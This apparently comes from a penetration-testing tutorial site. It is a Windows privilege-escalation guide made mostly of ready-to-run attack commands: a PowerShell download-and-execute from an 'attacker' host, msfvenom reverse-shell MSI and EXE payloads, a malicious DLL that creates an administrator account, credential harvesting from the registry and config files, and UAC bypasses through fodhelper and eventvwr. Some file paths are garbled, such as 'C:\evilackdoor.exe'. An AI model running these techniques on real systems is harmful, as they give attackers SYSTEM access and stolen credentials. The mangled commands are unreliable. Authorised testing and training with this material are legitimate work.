Windows Privilege Escalation: AlwaysInstallElevated, Token Impersonation, and DLL Hijacking

Windows privilege escalation is an art form built on decades of Windows internals quirks. From misconfigured services to abusive token privileges, this guide covers the techniques you'll use in every Windows pentest engagement.

Initial Enumeration

Understand your foothold before launching any exploits:

:: Who am I and what groups do I belong to?
whoami /all

:: OS version and architecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

:: Installed patches (compare against exploit databases)
wmic qfe list brief

:: Running processes
tasklist /v

:: Network connections and listening ports
netstat -ano

:: Environment variables
set

Automated Enumeration Tools

# WinPEAS — Windows Privilege Escalation Awesome Scripts
# Transfer to target and run:
winpeas.exe
# Or in PowerShell:
IEX (New-Object Net.WebClient).DownloadString('http://attacker/winpeas.ps1')

# PowerUp — PowerShell module for common misconfigurations
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt — C# security audit tool (more stealthy, used in real engagements)
Seatbelt.exe -group=all

AlwaysInstallElevated

If two registry keys are set, any user can install MSI packages as SYSTEM:

":: Check registry keys
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

:: If both return 0x1 (enabled), create a malicious MSI:
# On attacker machine (msfvenom):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444     -f msi -o evil.msi

:: On target — install as current user, runs as SYSTEM:
msiexec /quiet /qn /i evil.msi

Unquoted Service Paths

When a service binary path contains spaces and isn't quoted, Windows searches each space-delimited path segment for an executable:

:: Find unquoted service paths
wmic service get name,displayname,pathname,startmode |     findstr /i "auto" | findstr /iv "c:\windows" | findstr /iv """

:: Example vulnerable path:
:: C:\Program Files\Custom App\service.exe
:: Windows tries: C:\Program.exe, then C:\Program Files\Custom.exe

:: Create malicious binary at the writable intercept point
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444     -f exe -o "C:\Program Files\Custom.exe"

:: Restart the service (if you have permission, or wait for reboot)
sc stop "CustomService" && sc start "CustomService"

Weak Service Permissions

:: Check permissions on service binaries
icacls "C:\Program Files\VulnerableApp\service.exe"

:: If your user has Write permissions, replace the binary
copy evil.exe "C:\Program Files\VulnerableApp\service.exe"

:: Check if you can modify service configuration
sc qc "VulnerableService"
:: If SERVICE_CHANGE_CONFIG is allowed:
sc config "VulnerableService" binpath= "C:\evilackdoor.exe"
sc start "VulnerableService"

:: Use accesschk.exe to find writable services
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

Token Impersonation

Token impersonation is one of the most reliable Windows PrivEsc techniques. If you have SeImpersonatePrivilege (common for service accounts like IIS, SQL Server), you can impersonate SYSTEM:

":: Check current privileges
whoami /priv
:: Look for: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege

:: PrintSpoofer — works on Windows 10, Server 2016/2019
PrintSpoofer.exe -i -c cmd

:: RoguePotato — for environments where PrintSpoofer doesn't work
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe" -l 9999

:: JuicyPotato — older systems (Windows 7/8/Server 2008/2012)
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
:: CLSID varies by OS version — check the JuicyPotato GitHub

:: GodPotato — works across Windows 2012-2022
GodPotato.exe -cmd "cmd /c whoami"

DLL Hijacking

Windows searches for DLLs in a predictable order. If a privileged process loads a DLL from a user-writable directory, you win:

":: DLL search order (simplified):
:: 1. The directory the executable is in
:: 2. C:\Windows\System32
:: 3. C:\Windows
:: 4. Directories in PATH

:: Use Process Monitor (procmon) to find "NAME NOT FOUND" DLL loads
:: Filter: Process Name = target.exe, Result = NAME NOT FOUND, Path ends with .dll

:: Create malicious DLL (DLL_template.c)
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}

:: Compile:
x86_64-w64-mingw32-gcc -shared -o missing.dll DLL_template.c

:: Place in the writable directory that's searched before System32
copy missing.dll "C:\Program Files\VulnerableApp"

Stored Credentials

:: Windows Credential Manager
cmdkey /list
:: If credentials are stored for a server, runas as that user:
runas /savecred /user:DOMAIN\admin "cmd.exe"

:: Registry stored credentials (old AutoLogon, VNC, etc.)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

:: Search for password in common files
findstr /si "password" *.txt *.ini *.config *.xml 2>nul
findstr /si "password" C:\inetpub\*.config 2>nul

:: Unattend.xml files (leftover from Windows deployment)
dir /b /s C:\Unattend.xml C:\sysprep.inf C:\sysprep\sysprep.xml 2>nul

Scheduled Task Abuse

:: List scheduled tasks
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"

:: If a task runs as SYSTEM and executes a writable script:
icacls "C:\Scriptsackup.bat"
:: If writable, append a command:
echo net user hacker P@ssw0rd /add >> C:\Scriptsackup.bat

UAC Bypass

User Account Control prompts when a medium-integrity process tries to do admin actions. Common bypasses:

:: fodhelper.exe bypass (Windows 10)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
fodhelper.exe

:: eventvwr.exe bypass (Windows 7-10)
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f
eventvwr.exe

:: Using UACME — comprehensive collection of UAC bypass techniques
UACME.exe 41  # method 41 = fodhelper variant

The Privilege Escalation Generator generates tailored Windows PrivEsc commands based on the access rights and system information you provide. After escalating, use the Active Directory Generator for domain-level post-exploitation.